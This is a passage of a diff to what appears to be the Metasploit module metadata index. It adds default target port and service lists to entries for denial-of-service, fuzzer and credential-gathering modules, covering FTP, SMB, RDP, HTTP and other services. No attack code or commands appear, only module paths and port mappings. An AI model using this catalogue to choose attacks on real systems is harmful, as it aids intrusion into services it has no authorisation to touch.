"autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/appian/appian_bpm.rb", @@ -7803,6 +10542,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb", @@ -7835,6 +10580,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb", @@ -7868,6 +10619,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb", @@ -7899,6 +10657,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb", @@ -7934,6 +10699,12 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb", @@ -7969,6 +10740,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", @@ -8000,6 +10778,12 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/solarftp_user.rb", @@ -8031,6 +10815,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/titan626_site.rb", @@ -8063,6 +10854,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb", @@ -8094,6 +10892,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb", @@ -8125,6 +10930,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb", @@ -8156,6 +10968,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb", @@ -8185,6 +11004,12 @@ "platform": "", "arch": "", "rport": 27888, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/dos/windows/games/kaillera.rb", @@ -8218,6 +11043,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb", @@ -8249,6 +11080,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/http/pi3web_isapi.rb", @@ -8280,6 +11126,12 @@ "platform": "", "arch": "", "rport": 5355, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb", @@ -8311,6 +11163,12 @@ "platform": "", "arch": "", "rport": 53, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/nat/nat_helper.rb", @@ -8351,6 +11209,12 @@ "platform": "", "arch": "", "rport": 3389, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb", @@ -8383,6 +11247,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb", @@ -8416,6 +11288,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb", @@ -8448,6 +11328,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb", @@ -8480,6 +11368,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms09_001_write.rb", @@ -8515,6 +11411,12 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb", @@ -8546,6 +11448,12 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb", @@ -8579,6 +11487,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb", @@ -8612,6 +11526,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb", @@ -8647,6 +11569,12 @@ "platform": "", "arch": "", "rport": 138, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb", @@ -8676,6 +11604,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb", @@ -8705,6 +11641,12 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb", @@ -8736,6 +11678,18 @@ "platform": "", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb", @@ -8766,6 +11720,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb", @@ -8797,6 +11757,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/tftp/pt360_write.rb", @@ -8828,6 +11794,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/windows/tftp/solarwinds.rb", @@ -8860,6 +11832,12 @@ "platform": "", "arch": "", "rport": 5247, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/wireshark/capwap.rb", @@ -8891,6 +11869,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/wireshark/chunked.rb", @@ -8923,6 +11907,12 @@ "platform": "", "arch": "", "rport": 389, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/wireshark/cldap.rb", @@ -8953,6 +11943,12 @@ "platform": "", "arch": "", "rport": 389, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/wireshark/ldap.rb", @@ -8986,6 +11982,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-12 22:55:38 +0000", "path": "/modules/auxiliary/fileformat/badpdf.rb", @@ -9019,6 +12021,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-05 11:51:48 +0000", "path": "/modules/auxiliary/fileformat/multidrop.rb", @@ -9049,6 +12057,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-06 11:26:20 +0000", "path": "/modules/auxiliary/fileformat/odt_badodt.rb", @@ -9078,6 +12092,12 @@ "platform": "", "arch": "", "rport": 53, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb", @@ -9107,6 +12127,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/ftp/client_ftp.rb", @@ -9137,6 +12163,12 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb", @@ -9167,6 +12199,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/http/http_form_field.rb", @@ -9196,6 +12243,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/http/http_get_uri_long.rb", @@ -9225,6 +12278,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb", @@ -9254,6 +12313,12 @@ "platform": "", "arch": "", "rport": 123, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-09-12 09:54:09 +0000", "path": "/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb", @@ -9283,6 +12348,12 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb", @@ -9312,6 +12383,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb", @@ -9341,6 +12420,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb", @@ -9370,6 +12457,12 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb", @@ -9399,6 +12492,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb", @@ -9428,6 +12529,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb", @@ -9457,6 +12566,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb", @@ -9486,6 +12603,18 @@ "platform": "", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb", @@ -9515,6 +12644,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb", @@ -9544,6 +12679,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb", @@ -9573,6 +12714,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb", @@ -9602,6 +12749,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb", @@ -9631,6 +12784,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb", @@ -9660,6 +12827,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/tds/tds_login_username.rb", @@ -9691,6 +12872,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/gather/advantech_webaccess_creds.rb", @@ -9720,6 +12916,21 @@ "platform": "Linux", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/alienvault_iso27001_sqli.rb", @@ -9752,6 +12963,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb", @@ -9783,6 +13009,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/android_browser_file_theft.rb", @@ -9814,6 +13046,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb", @@ -9845,6 +13083,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/android_htmlfileprovider.rb", @@ -9877,6 +13121,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", @@ -9909,6 +13159,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/gather/android_stock_browser_uxss.rb", @@ -9942,6 +13198,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-21 08:50:26 +0000", "path": "/modules/auxiliary/gather/apache_rave_creds.rb", @@ -9973,6 +13244,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb", @@ -10002,6 +13279,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb", @@ -10034,6 +13317,12 @@ "platform": "", "arch": "", "rport": 5038, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-30 15:18:23 +0000", "path": "/modules/auxiliary/gather/asterisk_creds.rb", @@ -10063,6 +13352,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/avtech744_dvr_accounts.rb", @@ -10092,6 +13396,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/browser_info.rb", @@ -10124,6 +13434,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-11 01:45:41 +0000", "path": "/modules/auxiliary/gather/browser_lanipleak.rb", @@ -10153,6 +13469,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/censys_search.rb", @@ -10183,6 +13505,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb", @@ -10213,6 +13550,12 @@ "platform": "", "arch": "", "rport": 264, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/gather/checkpoint_hostname.rb", @@ -10242,6 +13585,12 @@ "platform": "", "arch": "", "rport": 1604, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/gather/citrix_published_applications.rb", @@ -10272,6 +13621,12 @@ "platform": "", "arch": "", "rport": 1604, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/gather/citrix_published_bruteforce.rb", @@ -10305,6 +13660,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/gather/coldfusion_pwd_props.rb", @@ -10334,6 +13704,21 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/corpwatch_lookup_id.rb", @@ -10363,6 +13748,21 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 08:43:10 +0000", "path": "/modules/auxiliary/gather/corpwatch_lookup_name.rb", @@ -10392,6 +13792,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/d20pass.rb", @@ -10423,6 +13829,12 @@ "platform": "Windows", "arch": "", "rport": 1604, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/darkcomet_filedownloader.rb", @@ -10455,6 +13867,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-19 22:15:14 +0000", "path": "/modules/auxiliary/gather/dolibarr_creds_sqli.rb", @@ -10485,6 +13912,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/doliwamp_traversal_creds.rb", @@ -10520,6 +13962,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/drupal_openid_xxe.rb", @@ -10551,6 +14008,21 @@ "platform": "", "arch": "", "rport": 4679, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/gather/eaton_nsm_creds.rb", @@ -10581,6 +14053,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/gather/emc_cta_xxe.rb", @@ -10612,6 +14099,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-07-15 15:38:56 +0000", "path": "/modules/auxiliary/gather/enum_dns.rb", @@ -10645,6 +14138,21 @@ "platform": "", "arch": "", "rport": 8400, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/eventlog_cred_disclosure.rb", @@ -10674,6 +14182,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/external_ip.rb", @@ -10707,6 +14230,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb", @@ -10741,6 +14279,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb", @@ -10774,6 +14318,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb", @@ -10805,6 +14355,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 16:06:07 +0000", "path": "/modules/auxiliary/gather/get_user_spns.py", @@ -10838,6 +14394,12 @@ "platform": "", "arch": "", "rport": 5227, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/hp_enum_perfd.rb", @@ -10868,6 +14430,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/hp_snac_domain_creds.rb", @@ -10897,6 +14474,21 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + 